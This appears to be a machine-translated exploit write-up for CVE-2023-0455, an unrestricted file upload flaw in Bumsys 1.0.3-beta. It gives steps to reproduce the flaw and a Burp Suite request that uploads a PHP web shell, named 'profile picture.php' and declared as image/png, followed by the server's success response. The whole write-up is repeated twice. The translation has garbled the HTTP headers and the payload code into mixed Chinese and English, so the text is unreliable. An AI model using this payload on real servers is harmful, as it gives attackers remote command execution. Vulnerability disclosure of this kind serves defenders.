利用标题: -UNILOGIES/BUMSYS V1.0.3 -BETA-无限制的文件上传
Google Dork : NA
日期: 19-01-2023
漏洞作者: Affan Ahmed
供应商HomePage: https://github.com/unilogies/bumsys
软件link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip
版本: 1.0.3-beta
测试ON: Windows 11,XAMPP-8.2.0
CVE : CVE-2023-0455
=====================================
步骤_to_reproduce
=====================================
burpsuite-Request
=================================================================================================
post/xhr/?module=settingspage=updateshop http/1.1
host: demo.bumsys.org
cookie: eid=1; CurrencySymbol=%EF%B7%BC; keepalive=1; __0BB0B4AAF0F729565DBDB80308ADAC3386976AD3=9LQOP41SSSSG3I9TRH73ENQBI0I7
内容长度: 1280
sec-ch-ua:'铬'; v='109','not_a brand'; v='99'
X-CSRF-Token: 78ABB0CC27AB54E87F66E8160DAB3AB48261A8B4
sec-ch-ua-mobile:0
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/109.0.5414.75 Safari/537.36
content-type:多部分/form-data;边界=--- WebKitformBoundaryno0QAD84EKUMUGAA
ACCEPT: /
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-platform:'Windows'
Origin: https://demo.bumsys.org
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
REFEER: https://demo.bumsys.org/settings/shop-list/
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
连接:关闭
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='shopname'
测试
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='ShopAddress'
测试
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='ShopCity'
测试
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='Shopstate'
TestState
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='ShopPostalCode'
700056
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='Shopcountry'
Testind
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='Shopphone'
895623122
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='Shopemail'
[email protected]
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='ShopInvoIceFooter'
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='Shoplogo';文件名='profile picture.php'
content-type:图像/png
?php echo系统($ _请求['dx']);
==================================================================================================
burpsuite响应
==================================================================================================
http/1.1 200好
Date: THU,2023年1月19日073:14:26 GMT
server: apache/2.4.51(unix)openssl/1.0.2k-fips
X-Power-By: PHP/7.0.33
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
连接:关闭
content-type:文本/html; charset=UTF-8
内容长度: 65
DIV类='Alert Alert-Success'Shop成功更新。/DIV
==================================================================================================
VIDEO-POC :
Google Dork : NA
日期: 19-01-2023
漏洞作者: Affan Ahmed
供应商HomePage: https://github.com/unilogies/bumsys
软件link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip
版本: 1.0.3-beta
测试ON: Windows 11,XAMPP-8.2.0
CVE : CVE-2023-0455
=====================================
步骤_to_reproduce
=====================================
- 导航到此url: [https://demo.bumsys.org/settings/shop-list/](3https://demo.bumsys.org/settings/settings/shop-list/
- 单击“动作”按钮编辑配置文件
- 单击“选择徽标”按钮上传图像
- 拦截邮政请求并进行以下更改。
burpsuite-Request
=================================================================================================
post/xhr/?module=settingspage=updateshop http/1.1
host: demo.bumsys.org
cookie: eid=1; CurrencySymbol=%EF%B7%BC; keepalive=1; __0BB0B4AAF0F729565DBDB80308ADAC3386976AD3=9LQOP41SSSSG3I9TRH73ENQBI0I7
内容长度: 1280
sec-ch-ua:'铬'; v='109','not_a brand'; v='99'
X-CSRF-Token: 78ABB0CC27AB54E87F66E8160DAB3AB48261A8B4
sec-ch-ua-mobile:0
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/109.0.5414.75 Safari/537.36
content-type:多部分/form-data;边界=--- WebKitformBoundaryno0QAD84EKUMUGAA
ACCEPT: /
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-platform:'Windows'
Origin: https://demo.bumsys.org
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
REFEER: https://demo.bumsys.org/settings/shop-list/
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
连接:关闭
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='shopname'
测试
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='ShopAddress'
测试
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='ShopCity'
测试
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='Shopstate'
TestState
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='ShopPostalCode'
700056
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='Shopcountry'
Testind
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='Shopphone'
895623122
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='Shopemail'
[email protected]
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='ShopInvoIceFooter'
------ webkitformboundaryno0qad84ekumugaa
content-disposition: form-data;名称='Shoplogo';文件名='profile picture.php'
content-type:图像/png
?php echo系统($ _请求['dx']);
==================================================================================================
burpsuite响应
==================================================================================================
http/1.1 200好
Date: THU,2023年1月19日073:14:26 GMT
server: apache/2.4.51(unix)openssl/1.0.2k-fips
X-Power-By: PHP/7.0.33
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
连接:关闭
content-type:文本/html; charset=UTF-8
内容长度: 65
DIV类='Alert Alert-Success'Shop成功更新。/DIV
==================================================================================================
VIDEO-POC :